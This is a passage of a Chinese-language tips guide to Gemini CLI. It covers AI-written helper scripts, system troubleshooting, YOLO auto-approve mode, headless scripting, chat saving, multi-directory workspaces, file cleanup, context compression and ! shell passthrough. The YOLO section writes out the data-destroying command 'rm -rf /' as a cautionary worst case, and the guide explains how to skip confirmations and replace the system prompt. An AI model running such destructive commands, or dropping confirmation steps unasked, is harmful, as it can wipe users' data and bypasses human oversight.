Gemini CLI 会起草代码，并在您批准后将其写入文件（例如 script.js）。然后您可以通过使用 ! shell 命令（例如 !node script.js）或通过要求 Gemini CLI 执行它来运行它（AI 可能会自动使用 run_shell_command 来执行它刚编写的脚本，如果它认为这是计划的一部分）。

通过 MCP 实现的临时工具： 在高级场景中，AI 甚至可能建议为某些专门任务启动 MCP 服务器。例如，如果您的提示涉及一些最好在 Python 中完成的繁重文本处理，Gemini 可能会在 Python 中生成一个简单的 MCP 服务器并运行它。虽然这更少见，但它展示了 AI 可以即时设置新的”代理”。（Gemini CLI 团队的一张幻灯片幽默地提到”为一切提供 MCP 服务器，甚至一个名为 LROwn 的服务器”——暗示您可以让 Gemini 运行自己或另一个模型的实例，虽然这更多的是技巧而非实际用途！）

这里的主要好处是自动化。您无需手动停下来编写辅助脚本，而是让 AI 作为流程的一部分来完成它。就像拥有一个可以按需创建工具的助手。这对于数据转换任务、批处理操作或内置工具不直接提供的一次性计算特别有用。

细微差别和安全性： 当 Gemini CLI 为新工具编写代码时，您仍应在运行前审查它。/diff 视图（Gemini 会在您批准写入文件之前显示文件差异）是您检查代码的机会。确保它按预期执行，没有恶意或破坏性操作（除非您的提示明确要求，否则 AI 不应产生有害内容，但仍需您像对待来自 AI 的任何代码一样，仔细检查逻辑，特别是对于删除或修改大量数据的脚本）。

示例场景： 假设您有一个 CSV 文件，想以复杂方式过滤它。您要求 Gemini CLI 执行此操作，它可能会说：”我将编写一个 Python 脚本来解析 CSV 并应用过滤器。”然后它创建 filter_data.py。在您批准并运行后，您得到结果，您可能再也不需要该脚本了。这种工具的临时创建是一个专业操作——它展示了 AI 能高效自主扩展其能力。

提示： 如果您发现脚本在直接上下文之外有用，您可以将其保存为永久工具或命令。例如，如果 AI 生成了一个很棒的日志处理脚本，您可能稍后将其转换为自定义斜杠命令（技巧 #2）以便于重用。Gemini 的生成能力与扩展挂钩的结合意味着您的工具包可以在您使用 CLI 的过程中不断演进。

总之，不要让 Gemini 局限于它自带的功能上。将其视为可以即时编写新程序甚至迷你服务器来帮助解决问题的初级开发人员。这种方法体现了 Gemini CLI 的智能理念——它会弄清楚需要什么工具，即使它必须在现场编码它们。

技巧9：使用 Gemini CLI 排除系统故障或修改配置

快速使用场景： 您可以在代码项目之外运行 Gemini CLI 来帮助处理一般的系统任务——将其视为您操作系统的智能助手。例如，如果您的 shell 表现异常，您可以在主目录中打开 Gemini 并询问：”修复我的 .bashrc 文件，它有错误。” Gemini 然后可以打开并编辑您的配置文件。

这个技巧突显了Gemini CLI 不仅适用于编码项目——它是您整个开发环境的 AI 助手。许多用户使用 Gemini 来自定义他们的开发设置或修复机器上的问题：

编辑配置文件： 您可以通过引用来加载您的 shell 配置（.bashrc 或 .zshrc），然后要求 Gemini CLI 优化或故障排除它。例如，”我的 PATH 没有选择 Go 二进制文件，能编辑我的 .bashrc 来修复吗？” AI 可以插入正确的 export 行。它会在保存更改之前向您显示差异以供确认。
诊断错误： 如果您在终端或应用程序日志中遇到神秘错误，您可以复制并将其提供给 Gemini CLI。它将分析错误消息，并经常建议解决步骤。这类似于使用 StackOverflow 或 Google，但 AI 直接检查您的场景。例如：”当我运行 npm install 时，我得到 EACCES 权限错误——如何修复？” Gemini 可能检测到 node_modules 中的权限问题，并指导您更改目录所有权或使用适当的节点版本管理器。
在项目外运行： 默认情况下，如果您在没有 .gemini 上下文的目录中运行 gemini，这只是意味着没有加载项目特定的上下文——但您仍可以使用 CLI的完整功能。这对于临时任务如系统故障排除很有用。您可能没有任何代码文件需要让AI处理，但仍可以通过它运行 shell 命令或让它获取网络信息。本质上，您将 Gemini CLI 视为可以为您执行事情的 AI 驱动终端，而不仅仅是聊天。
工作站自定义： 想要更改设置或安装新工具？您可以要求 Gemini CLI，”在我的系统上安装 Docker”或”配置我的 Git 使用 GPG 签名提交。” CLI 将尝试执行步骤。它可能会从网络获取说明（使用搜索工具），然后运行适当的 shell 命令。当然，始终监视它在做什么并批准命令——但它可以通过自动化多步骤设置过程来节省时间。一个真实例子：用户要求 Gemini CLI”将我的 macOS Dock 偏好设置为自动隐藏并删除延迟”，AI 能够执行必要的 defaults write 命令。

将此模式视为将 Gemini CLI 用作智能 shell。事实上，您可以将其与技巧 16（shell 直通模式）结合——有时您可能进入 ! shell 模式来验证某些内容，然后返回 AI 模式让它分析输出。

注意事项： 进行系统级任务时，要谨慎处理有广泛影响的命令（如 rm -rf 或系统配置更改）。Gemini CLI 通常会要求确认，并且在您看到之前不会运行任何内容。但作为高级用户，您应该了解正在进行什么更改。如果不确定，请要求 Gemini 在运行前解释命令（例如，”解释 defaults write com.apple.dock autohide-delay -float 0 的作用”——如果您以这种方式提示，它会很乐意解释而不是直接执行）。

故障排除额外功能： 另一个巧妙的用途是使用 Gemini CLI 解析日志或配置文件以查找问题。例如，”扫描此 Apache 配置中的错误”（使用 @httpd.conf），或”查看昨天下午 2 点左右的 syslog 错误”（如果可访问，使用 @/var/log/syslog）。就像有一个协管管理员。它甚至可以建议崩溃的可能原因或提出常见错误模式的修复方案。

总之，不要犹豫,启动 Gemini CLI 作为您环境问题的助手。它能加速您的所有工作流程——不仅仅是编写代码，还维护您编写代码的系统。许多用户报告说，在 Gemini 的帮助下自定义他们的开发环境感觉就像有一个技术伙伴随时待命，处理繁琐或复杂的设置步骤。

技巧10：YOLO 模式 - 自动批准工具操作（谨慎使用）

快速使用场景： 如果您很自信（或愿意冒险），您可以让 Gemini CLI 无需每次征求您的确认就运行工具操作。这是YOLO 模式（You Only Live Once，你只活一次）。它通过 --yolo 标志或在会话期间按 Ctrl+Y 启用。在 YOLO 模式下，一旦 AI 决定使用工具（如运行 shell 命令或写入文件），它立即执行，没有那个”批准？(y/n)”提示。

为什么使用 YOLO 模式？ 主要是为了速度和便利性，当您信任 AI 的操作时。经验丰富的用户在进行大量重复安全操作时可能会切换 YOLO 开启。例如，如果您要求 Gemini 连续生成 10 个不同文件，批准每个操作会减慢流程；YOLO 模式只会让它们全部自动写入。另一个场景是在完全自动化的脚本或 CI 管道中使用 Gemini CLI——您可以使用 --yolo 自动运行它，这样它就不会暂停确认。

要从一开始就以 YOLO 模式启动，使用以下命令启动 CLI：

1	gemini --yolo

或简写形式 gemini -y。您会在 CLI 中看到一些指示（如不同的提示符或通知）显示自动批准已开启。在交互式会话期间，您可以随时按 Ctrl+Y 切换它——CLI 通常会在页脚显示类似”YOLO 模式已启用（所有操作自动批准）”的消息。

重要警告： YOLO 模式强大但有风险。Gemini 团队自己将其标记为”敢于冒险的用户”使用——意味着您应该意识到 AI 可能可能执行危险命令而不询问。在正常模式下，如果 AI 决定运行 rm -rf /（最坏情况），您显然会拒绝。在 YOLO 模式下，该命令会立即运行（并可能毁掉您的一天）。虽然这种极端错误不太可能（AI 的系统提示包括安全指导方针），但确认的全部意义就是捕获任何不必要的操作。YOLO 移除了那张安全网。

YOLO 的最佳实践： 如果您想要一些便利而没有太多风险，可以考虑允许列表特定命令。例如，您可以在设置中配置某些工具或命令模式不需要确认（如允许所有 git 命令或只读操作）。事实上，Gemini CLI 支持跳过特定命令确认的配置：例如，您可以设置类似 "tools.shell.autoApprove": ["git ", "npm test"] 来始终运行那些命令。这样，您可能不需要全局 YOLO 模式——您只选择性地 YOLO 安全命令。另一种方法：使用 YOLO 时在沙箱或容器中运行 Gemini，这样即使它做了疯狂的事情，您的系统也会受到保护（Gemini 有 --sandbox 标志在 Docker 容器中运行工具）。

许多高级用户经常切换 YOLO 开启和关闭——在进行一系列轻微文件编辑或查询时开启，在即将执行关键操作时关闭。您可以做同样的事情，使用键盘快捷键作为快速切换。

总之，YOLO 模式以监督为代价消除了摩擦。这是一个要谨慎明智使用的专业功能。它真正展示了对 AI 的信任（或鲁莽！）。如果您是 Gemini CLI 的新手，在清楚了解它倾向于做什么的模式之前，您可能应该避免 YOLO。如果您确实使用它，请加倍注意版本控制或备份——以防万一。

（如果有什么安慰的话，您并不孤单——社区中的许多人开玩笑说”我 YOLO 了，Gemini 做了些疯狂的事。”所以使用它，但是…嗯，您只活一次。）

技巧11：无头和脚本模式（在后台运行 Gemini CLI）

快速使用场景： 您可以通过以无头模式运行 Gemini CLI 来在脚本或自动化中使用它。这意味着您通过命令行参数或环境变量提供提示（甚至完整的对话），Gemini CLI 产生输出并退出。这对于与其他工具集成或在计划上触发 AI 任务很有用。

例如，要在不打开 REPL 的情况下获得一次性答案，您已经看到可以使用 gemini -p "...prompt..."。这已经是无头使用：它打印模型响应并返回到 shell。但您可以做的更多：

系统提示覆盖： 如果您想使用自定义系统角色或指令集（与默认不同）运行 Gemini CLI，可以使用环境变量 GEMINI_SYSTEM_MD。通过设置它，您告诉 Gemini CLI 忽略其内置系统提示并使用您提供的文件。例如：

1 2	export GEMINI_SYSTEM_MD="/path/to/custom_system.md" gemini -p "Perform task X with high caution"

这将加载您的 custom_system.md 作为系统提示（AI 遵循的”角色”和规则），然后执行提示。或者，如果您设置 GEMINI_SYSTEM_MD=true，CLI 将在当前项目的 .gemini 目录中查找名为 system.md 的文件。这个功能非常高级——它基本上允许您替换 CLI 的内置大脑为您自己的指令，一些用户将其用于专门的工作流程（如模拟特定角色或执行超严格的策略）。谨慎使用它，因为替换核心提示可能会影响工具使用（核心提示包含关于 AI 如何选择和使用工具的重要指导）。

通过 CLI 的直接提示： 除了 -p，还有 -i（交互式提示），它使用初始提示启动会话，然后保持打开状态。例如：gemini -i "Hello, let's debug something" 将打开 REPL 并且已经向模型说过Hello。如果您希望在启动时立即询问第一个问题，这很有用。
使用 shell 管道脚本： 您不仅可以管道传输文本，还可以将文件或命令输出管道传输到 Gemini。例如：gemini -p "Summarize this log:" < big_log.txt 将把 big_log.txt 的内容输入到提示中（在短语”Summarize this log:”之后）。或者您可能执行 some_command | gemini -p "Given the above output, what went wrong?"。这种技术允许您将 Unix 工具与 AI 分析组合在一起。它是一次性操作意义上的无头。
在 CI/CD 中运行： 您可以将 Gemini CLI 合并到构建过程中。例如，CI 管道可能运行测试，然后使用 Gemini CLI 自动分析失败的测试输出并发布评论。使用 -p 标志和环境身份验证，这可以脚本化。（当然，确保环境有所需的 API 密钥或身份验证。）

另一个无头技巧：--format=json 标志（或配置设置）。如果您配置它，Gemini CLI 可以以 JSON 格式输出响应而不是人类可读的文本。这对于程序化消费很有用——您的脚本可以解析 JSON 并以结构化方式提取数据。

无头模式的重要性： 它将 Gemini CLI 从交互式助手转变为后端服务或实用程序，其他程序可以调用。您可以安排一个 cronjob，每晚运行一个 Gemini CLI 提示（想象生成一个报告或使用 AI 逻辑清理某些东西）。您可以将 IDE 中的按钮连接到触发无头 Gemini 运行来执行特定任务。

示例： 假设您想要一个新闻网站的每日摘要。您可以有一个脚本：

1	gemini -p "Web-fetch \"https://news.site/top-stories\" and extract the headlines, then write them to headlines.txt"

也可使用 --yolo，这样它就不会要求确认写入文件。这将使用网络获取工具来获取页面并使用文件写入工具保存标题。全部自动完成，无需人工干预。一旦您将 Gemini CLI 视为可脚本化组件，可能性是无穷的。

总之，无头模式将启用自动化。它是 Gemini CLI 与其他系统之间的桥梁。掌握它意味着您可以扩展您的 AI 使用——不仅仅是当您在终端中输入时，当您不在时，您的 AI 代理也可以为您工作。

提示：对于真正长时间运行的非交互式任务，您还可以研究 Gemini CLI 的”Plan”模式或它如何在不干预的情况下生成多步骤计划。这些是超出此范围的高级主题。在大多数情况下，通过无头模式精心制作单个提示可以实现很多目标。

技巧12：保存和恢复聊天会话

快速使用场景： 如果您已经使用 Gemini CLI 调试了一小时需要暂停，您可以不用丢失对话上下文。使用 /chat save 保存会话。之后（即使重启 CLI），您可以使用 /chat resume 从您离开的地方继续。这样，长时间运行的对话可以暂停并无缝继续。

Gemini CLI 本质上有一个内置的聊天会话管理器。需要了解的命令有：

/chat save - 将当前对话状态保存在您提供的标签/名称下。标签就像该会话的文件名或键。如果需要，您可以经常保存，如果标签存在，它将覆盖它。（使用描述性名称很有帮助——例如，chat save fix-docker-issue。）
/chat list - 列出您所有保存的会话（您使用的标签）。这有助于您记住之前保存的名称。
/chat resume - 恢复具有该标签的会话，将整个对话上下文和历史记录恢复到保存时的状态。就像您从未离开过一样。然后您可以从那个点继续聊天。
/chat share - （保存到文件）这很有用，因为您可以将整个聊天与其他人分享，他们可以继续会话。几乎像协作一样。

在底层，这些会话很可能存储在 ~/.gemini/chats/ 或类似位置中。它们包括对话消息和任何相关状态。这个功能对于以下情况非常有用：

长时间调试会话： 有时与 AI 调试可能是一个漫长的来回过程。如果您无法一次性解决，保存它并稍后回来（也许带着清醒的头脑）。AI 仍然会”记住”之前的所有内容，因为整个上下文被重新加载。
多日任务： 如果您将 Gemini CLI 用作项目的助手，您可能有一个”重构模块 X”的聊天会话跨越多天。每天您可以恢复该特定聊天，这样上下文不会每天重置。同时，您可能将另一个”编写文档”的会话单独保存。切换上下文只是保存一个和恢复另一个的问题。
团队交接： 这更具实验性，但理论上，您可以将保存的聊天内容与同事分享（保存的文件很可能是可移植的）。如果他们将它们放在他们的 .gemini 目录中并恢复，他们可以看到相同的上下文。协作的更简单实用的方法只是从日志中复制相关的问答并使用共享的 GEMINI.md 或提示，但值得注意的是会话数据是您保留的。

使用示例：

1	/chat save api-upgrade

(会话保存为”api-upgrade”）

/quit

（稍后，重新打开 CLI）

1 2	$ gemini gemini> /chat list

（显示：api-upgrade）

1	gemini> /chat resume api-upgrade

现在模型用上次交换的状态向您问好。您可以通过向上滚动来确认所有之前的消息都存在。

提示： 保存聊天时使用有意义的标签。不要使用 /chat save session1，给它一个与主题相关的名称（例如 /chat save memory-leak-bug）。这将帮助您稍后通过 /chat list 找到正确的那个。没有严格限制您可以保存多少会话，但偶尔清理旧会话可能是明智的。

这个功能将 Gemini CLI 变成持久的顾问。您不会丢失在对话中获得的知识；您可以随时暂停和恢复。这是与其他一些在关闭时会忘记上下文的 AI 界面的区别所在。对于高级用户来说，这意味着您可以与 AI 维护并行的工作线程。就像您为不同任务有多个终端标签页一样，您可以有多个保存的聊天会话，并在任何给定时间恢复您需要的那个。

技巧13：多目录工作区 - 一个 Gemini，多个文件夹

快速使用场景： 您的项目是否分散在多个仓库或目录中？您可以启动 Gemini CLI 同时访问所有这些，这样它会看到一个统一的工作区。例如，如果您的后端和前端是独立的文件夹，您可以同时包含这两个，这样 Gemini 可以编辑或引用两者中的文件。

有两种使用多目录模式的方式：

启动参数： 启动 Gemini CLI 时使用 --include-directories（或 -I）指定。例如：

1	gemini --include-directories "../backend:../frontend"

这假设您从例如 scripts 目录运行命令，并希望包含两个同级文件夹。您提供以冒号分隔的路径列表。然后 Gemini CLI 将所有这些目录视为一个大工作区的一部分。

保存设置： 在您的 settings.json 中，您可以定义 "includeDirectories": ["path1", "path2", ...]。如果您总是希望加载某些公共目录（例如，多个项目使用的共享库文件夹），这很有用。路径可以是相对的或绝对的。路径中的环境变量（如 ~/common-utils）是允许的。

当多目录模式激活时，CLI 的上下文和工具考虑所有包含位置的文件。> /directory show 命令将列出当前工作区中的哪些目录。您还可以在会话期间使用 /directory add 动态添加目录——它将即时加载它（可能像启动时那样扫描它以获取上下文）。

为什么要使用多目录模式？ 在微服务架构或模块化代码库中，通常一部分代码存在于一个仓库中，另一部分在不同的仓库中。如果您只在一个中运行 Gemini，它不会”看到”其他的。通过组合它们，您启用跨项目推理。例如，您可以问，”更新前端中的 API 客户端以匹配后端的新 API 端点”——Gemini 可以打开后端文件夹查看 API 定义，并同时打开前端代码相应地修改它。没有多目录模式，您必须一次处理一边并手动传递信息。

示例： 假设您有 client/ 和 server/。这样启动Gemini CLI：

1 2	cd client gemini --include-directories "../server"

现在在 gemini> 提示符下，如果您执行 > !ls，您将看到它可以列出 client 和 server 中的文件（它可能将它们显示为单独的路径）。您可以执行：

1	Open server/routes/api.py and client/src/api.js side by side to compare function names.

AI 将可以访问两个文件。或者您可能说：

1	The API changed: the endpoint "/users/create" is now "/users/register". Update both backend and frontend accordingly.

它可以同时在后端路由中创建补丁并调整前端获取调用。

在底层，Gemini 合并这些目录的文件索引。如果每个目录都很大，可能会有一些性能考虑，但通常它可以很好地处理多个中小型项目。备忘单指出这有效地创建了一个具有多个根目录的工作区。

技巧： 即使您不总是使用多目录模式，要知道您仍然可以通过提示中的绝对路径（@/path/to/file）引用跨文件系统的文件。但是，没有多目录，Gemini 可能没有权限编辑这些文件或知道主动从中加载上下文。多目录正式地将它们包含在范围内，因此它了解整个集合的任务（如搜索或跨整个集合的代码生成）的所有文件。

删除目录： 如果需要，/directory remove （或类似命令）可以从工作区中删除一个目录。这不太常见，但如果您意外包含了某些东西，可以删除它。

总之，多目录模式统一您的上下文。对于 polyrepo 项目或代码分散的任何情况，这是必须的。它使 Gemini CLI 的行为更像是一个打开了整个解决方案的 IDE。作为高级用户，这意味着您的项目中没有任何部分超出了 AI 的可控范围。

技巧14：使用 AI 协助组织和清理您的文件

快速使用场景： 对凌乱的 Downloads 文件夹或无组织的项目资产感到厌倦？您可以招募 Gemini CLI 充当智能组织者。通过向它提供目录概览，它可以分类文件甚至将它们移动到子文件夹中（在您批准的情况下）。例如，”清理我的 Downloads：将图像移动到 Images 文件夹，PDF 移动到 Documents，并删除临时文件。”

因为 Gemini CLI 可以读取文件名、大小，甚至查看文件内容，它可以就文件组织做出明智的决定。一个社区创建的工具称为“Janitor AI”展示了这一点：它通过 Gemini CLI 运行，将文件分类为重要与垃圾，并相应地分组。过程涉及扫描目录，使用 Gemini 对文件名和元数据（如果需要还有内容）的推理，然后将文件移动到类别中。值得注意的是，它没有自动删除垃圾——而是将它们移动到 Trash 文件夹以供审查。

以下是如何手动使用 Gemini CLI 复制这样的工作流程：

扫描： 使用提示让 Gemini 列出文件和分类。例如：

1	列出当前目录中的所有文件，并将它们分类为"图像"、"视频"、"文档"、"档案"或"其他"。

Gemini 可能使用 !ls 或类似命令获取文件列表，然后分析文件名称/扩展名以对文件进行分类。

规划： 询问 Gemini 它想要如何优化。例如：

1	为这些文件提出新的文件夹结构。我想按类型（图像、视频、文档等）分开。同时识别任何看起来像重复或不必要的文件。

AI 可能以一个计划响应：例如，*”创建文件夹：Images/、Videos/、Documents/、Archives/。将 X.png、Y.jpg 移动到 Images/；将 A.mp4 移动到 Videos/；等等。文件 temp.txt 看起来不必要（也许是一个临时文件）。”*

通过确认执行移动： 然后您可以指示它执行计划。它可能为每个文件使用 mv 等shell命令。因为这会修改您的文件系统，您将获得每个操作的确认提示（除非您 YOLO 它）。仔细批准移动。完成后，您的目录将按照建议整齐地组织。

在整个过程中，Gemini 的自然语言理解是关键。例如，它可以推理出 IMG_001.png 是一个图像或 presentation.pdf 是一个文档，即使没有明确说明。它甚至可以打开图像（使用其视觉能力）查看其中的内容——例如，区分截图与照片或图标——并相应地命名或排序。

按内容重命名文件： 一个特别神奇的用途是让 Gemini 将文件重命名为更具描述性。Dev Community 文章”7 Insane Gemini CLI Tips”描述了 Gemini 如何**扫描图像并根据其内容自动重命名它们。例如，名为 IMG_1234.jpg 的文件如果 AI 看到它是登录屏幕的截图，可能被重命名为 login_screen.jpg。为此，您可以提示：

1	对于这里的每个 .png 图像，查看其内容并重命名为具有描述性的内容。

Gemini 将打开每个图像（通过视觉工具），获取描述，然后提议一个 mv IMG_1234.png login_screen.png 操作。这可以显著改善资产的组织，特别是在设计或照片文件夹中。

二次处理法： Janitor AI 讨论指出了一个两步过程：首先是广泛分类（重要与垃圾与其他），然后完善组。你可以效仿这种方法：先将可能需要删除的文件（比如大型安装程序 .dmg 文件或重复文件）与需要保留的文件分开，然后专注于整理保留的文件。一定要再次检查 AI 标记为垃圾的文件；它的判断并不总是正确，因此需要人工监督。

安全提示： 当让 AI 对文件移动或删除时，要有备份或至少准备好撤销（使用 /restore 或您自己的备份）。进行试运行是明智的：询问 Gemini 打印它将要运行以组织文件的命令，但不执行它们，这样您可以审查。例如：”列出此计划所需的 mv 和 mkdir 命令，但还不要执行它们。”一旦您审查了列表，您可以复制粘贴执行它们，或指示 Gemini 继续。

这是使用 Gemini CLI 处理”非显而易见”任务的绝佳示例——它不仅仅是写代码，而是用 AI 智慧进行系统整理。它可以节省时间，为混乱的环境带来一些秩序。毕竟，作为开发者，我们都会积累各种杂乱文件（日志、旧脚本、下载文件），而一个 AI 管家会非常有用。

技巧15：压缩长对话以保持在上下文内

快速使用场景： 如果您与 Gemini CLI 聊天了很长时间，您可能会达到模型的上下文长度限制，或者只是发现会话变得难以处理。使用 /compress 命令总结到目前为止的对话，用简洁的摘要替换完整的聊天记录。这为更多讨论释放空间，而无需从头开始。

大语言模型有固定的上下文窗口（Gemini 2.5 Pro 的非常大，但不是无限的）。如果您超过它，模型可能会开始忘记较早的消息或失去连贯性。/compress 功能本质上是您会话的 AI 生成的 tl;dr，保留重要要点但删除逐分钟的对话。

它如何工作： 当您键入 /compress 时，Gemini CLI 将获取整个对话（除系统上下文外）并生成一个摘要。然后它用该摘要替换聊天记录作为单个系统或助手消息，保留基本细节但丢弃每分钟对话。它将指示发生了压缩。例如，在 /compress 之后，您可能会看到类似的内容：

— 对话压缩 —
讨论摘要：用户和助手一直在调试应用程序中的内存泄漏。关键点：问题可能在 DataProcessor.js 中，其中对象没有被释放。助手建议添加日志记录并识别可能的无限循环。用户即将测试修复。
— 摘要结束 —

从那时起，模型只有该摘要（加上新消息）作为之前发生的事情的上下文。如果摘要捕获了突出信息，这通常就足够了。

何时压缩： 理想情况下是在您遇到限制之前。如果您注意到会话变得冗长（数百回合或上下文中有很多代码），主动压缩。备忘单提到了自动压缩设置（例如，当上下文超过最大值的 60% 时压缩）。如果启用该功能，Gemini 可能自动压缩并让您知道。否则，手动 /compress 在您的工具包中。

压缩之后： 您可以正常继续对话。如果需要，您可以在非常长的会话中多次压缩。每次，您都会失去一些细节，所以不要没有理由地过于频繁压缩——您可能最终得到复杂讨论的过于简化的记忆。但通常模型自己的摘要在保留关键事实方面相当好（您可以随时重新陈述任何关键内容）。

上下文窗口示例： 假设您通过引用许多文件提供了大型代码库，并有 1M token 上下文（最大值）。如果您想要转换到项目的不同部分，而不是开始新会话（失去所有这些理解），您可以压缩。摘要将浓缩从代码中获得的知识（比如”我们加载了模块 A、B、C。A 有这些函数… B 以这些方式与 C 交互…”）。现在您可以在保留这些抽象知识的情况下继续询问新事物。

记忆与压缩： 请注意压缩不会保存到长期记忆，它对对话是局部的。如果您有想永不丢失的事实，请考虑技巧 4（添加到 /memory）——因为记忆条目将在压缩中存活（无论如何它们将被重新插入，因为它们在 GEMINI.md 上下文中）。压缩更多是关于临时聊天内容。

一个小的注意事项： 压缩之后，AI 的风格可能会略有改变，因为它实际上看到一个”全新的”带有摘要的对话。它可能会重新介绍自己或改变语气。您可以指示它如”从这里继续…（我们压缩了）”来平滑它。实际上，它通常都能很好地继续。

总结，*随着会话变长，请使用 /compress *来保持性能和相关性。这有助于 Gemini CLI 专注于大局，而不是对话历史中的每一个细节。这样，你就可以进行马拉松式的调试会话或广泛的设计讨论，而不会耗尽 AI 正在书写的”思维纸张”。

技巧16: 用 `!` 执行 Shell 命令（和你的终端对话）

快速应用场景： 在 Gemini CLI 的任何时刻，你都可以在命令前加上 ! 来执行真实的 shell 命令。比如，你想查看 git 状态，直接输入 !git status 就会在你的终端中执行。这样就不用来回切换窗口或上下文了——你仍然在 Gemini CLI 中，但实际上是在告诉它”让我快速执行这个命令”。

这个技巧介绍的是 Gemini CLI 中的 Shell 模式。有两种使用方式：

单次命令： 在提示符前加上 !，后面跟上任何命令和参数。这会在当前工作目录执行该命令，并直接显示输出结果。例如：

1	!ls -lh src/

会列出 src 目录中的文件，输出效果和正常终端一样。输出完成后，Gemini 提示符会重新出现，你可以继续聊天或执行更多命令。

持续 Shell 模式： 如果只输入 ! 并按回车，Gemini CLI 会切换到一个子模式，出现 shell 提示符（通常显示为 shell> 或类似形式）。现在你可以交互式地输入多个 shell 命令。这基本上就是 CLI 内置的一个迷你终端。再次输入 !（或 exit）就可以退出这个模式。例如：

!
shell> pwd
/home/alice/project
shell> python --version
Python 3.x.x
shell> !

最后一个 ! 之后，你就回到了正常的 Gemini CLI。

这有什么用？ 因为开发工作本身就是在操作和询问之间不断切换。你可能正在和 AI 讨论某个问题，突然需要编译代码或运行测试来验证什么。不用离开对话，你就能快速完成操作，然后把结果反馈给聊天。事实上，Gemini CLI 本身也经常在工具使用中这样做（比如你要求修复测试时，它可能会自动运行 !pytest）。但作为用户，你完全可以手动控制。

实际例子：

Gemini 建议修改代码后，你可以用 !npm run build 检查是否能编译通过，然后复制任何错误信息让 Gemini 帮忙解决。
想用 vim 或 nano 打开文件？你甚至可以通过 !nano filename 来启动（不过要注意，由于 Gemini CLI 有自己的界面，在里面使用交互式编辑器可能有点别扭——最好还是用内置的编辑器集成或复制到你的编辑器中）。
可以用 shell 命令为 AI 收集信息：比如用 !grep TODO -R . 找到项目中所有的 TODO，然后让 Gemini 帮忙处理这些待办事项。
或者简单用于环境任务：需要时用 !pip install some-package 安装包，都不用离开 CLI。

无缝交互： 一个很酷的特性是，对话内容可以直接引用命令输出。比如，你可以用 !curl http://example.com 获取一些数据，看到输出后，立即对 Gemini 说”把上面的输出格式化成 JSON”——因为输出内容显示在聊天中，AI 就有了处理它的上下文（只要内容不太大）。

将终端作为默认 Shell： 如果你发现自己总是在命令前加 !，其实可以把 shell 模式设为默认。一种方法是用特定工具模式启动 Gemini CLI（有默认工具的概念）。但更简单的方法：如果你计划运行大量手动命令而只是偶尔和 AI 交流，就在会话开始时直接进入 shell 模式（只输入 !）。然后你想提问时随时退出 shell 模式。这就像把 Gemini CLI 变成了你的正常终端，只是恰好有个 AI 随时待命。

与 AI 规划的集成： 有时 Gemini CLI 本身会建议运行某个 shell 命令。如果你同意，效果就和你手动输入 !command 一样。理解了这一点，你就知道可以随时干预。如果 Gemini 卡住了或者你想尝试什么，不用等它建议——你直接做就是，然后继续。

总而言之，! 透传机制意味着你不需要为了 shell 任务离开 Gemini CLI。它打破了和 AI 聊天与执行系统命令之间的界限。作为专业用户，这对效率来说太棒了——你的 AI 和你的终端成了一个持续的工作环境。

技巧17：将每个 CLI 工具视为潜在的 Gemini 工具

快速使用场景： Gemini CLI 可以利用您系统上安装的任何命令行工具解决问题。AI 可以访问 shell，所以如果您有 cURL、ImageMagick、git、Docker 或任何其他工具，Gemini 可以在适当时调用它。换句话说，您的整个 $PATH 是 AI 的工具包。这极大地扩展了它能做的事情——远超出了其内置工具的范围。

例如，假设您问：”将此文件夹中的所有 PNG 图像转换为 WebP 格式。”如果您安装了 ImageMagick 的 convert 实用程序，Gemini CLI 可能计划类似于：为每个文件使用带有 convert 命令的 shell 循环。确实，之前一篇博客的示例显示了这一点，其中用户提示批量转换图像，Gemini 使用 convert 工具执行了一个 shell 单行命令。

另一个场景：”将我的应用程序部署到 Docker。”如果存在 Docker CLI，AI 可以根据需要调用 docker build 和 docker run 步骤。或者”使用 FFmpeg 从 video.mp4 提取音频”——它可以构建 ffmpeg 命令。

这个技巧是关于心态：Gemini 不仅限于工具内部已有的功能（这已经相当广泛）。它可以弄清楚如何使用其他可用的程序来实现目标。它知道常见的语法，如果需要可以读取帮助文本（它可以在工具上调用 --help）。唯一的限制是安全性：默认情况下，它会对它想到的任何 run_shell_command 请求确认。但当您变得舒适时，您可能允许某些良性命令自动执行（请参阅 YOLO 或允许工具配置）。

注意： “能力越大，责任越大。”由于每个 shell 工具都是公平的游戏，您应该确保您的 $PATH 不包含任何您不希望 AI 意外运行的内容。这就是技巧 19（自定义 PATH）的用武之地——一些用户为 Gemini 创建了一个受限制的 $PATH，因此它不能，比如说，直接调用系统破坏性命令，或者可能不递归调用 gemini（以避免循环）。关键是，默认情况下如果 gcc 或 terraform 或任何东西在 $PATH 中，Gemini 可以调用它。这并不意味着它会随机这样做——只有当任务需要它时——但这是可能的。

思维过程示例： 想象一下你让 Gemini CLI：”搭建一个基础的 HTTP 服务器来提供当前目录的服务。”AI 可能会想：”我可以用 Python 内置的服务器来实现这个功能。”然后它会执行 !python3 -m http.server 8000 命令。看，它就这样使用了系统工具（Python）来启动服务器。这只是一个无害的例子。再比如：”检查这个 Linux 系统的内存使用情况。”AI 可能会使用 free -h 命令或者读取 /proc/meminfo 文件。它实际上就是通过使用可用的命令来执行系统管理员会做的事情。

所有工具都是 AI 能力的延伸：这听起来有点未来感，但不妨这样理解：任何命令行程序都可以看作是 AI 可以调用来扩展自身能力的”函数”。需要解决数学问题？它可以调用 bc （计算器）。需要处理图像？它可以调用图像处理工具。需要查询数据库？只要安装了相应的客户端并且有访问凭据，它就能使用。可能性是无限的。在其他 AI 代理框架中，这被称为工具使用，而 Gemini CLI 的设计充分信任其代理能够选择合适的工具。

当出错时： 但另一方面，如果 AI 误解了某个工具或者对它产生了幻觉，就可能尝试调用不存在的命令，或者使用错误的参数，从而导致错误。不过这不是什么大问题——你会看到错误信息，可以及时纠正或澄清。实际上，Gemini CLI 的系统提示很可能指导它先进行”试运行”（只是提出命令建议）而不是盲目执行，所以你通常有机会及时发现这些问题。随着时间的推移，开发者们也在不断改进工具选择逻辑，以减少这些失误。

核心要点是：要把 Gemini CLI 想象成一把超强的瑞士军刀——不仅有自带的刀片，更包含了你操作系统中的每一个工具。对于标准程序，你不需要专门指导它如何使用；通常它自己就懂，或者能快速搞明白。这极大地扩展了你能完成的任务范围。就像拥有了一个熟悉如何运行你安装的几乎所有程序的初级开发者或运维工程师。

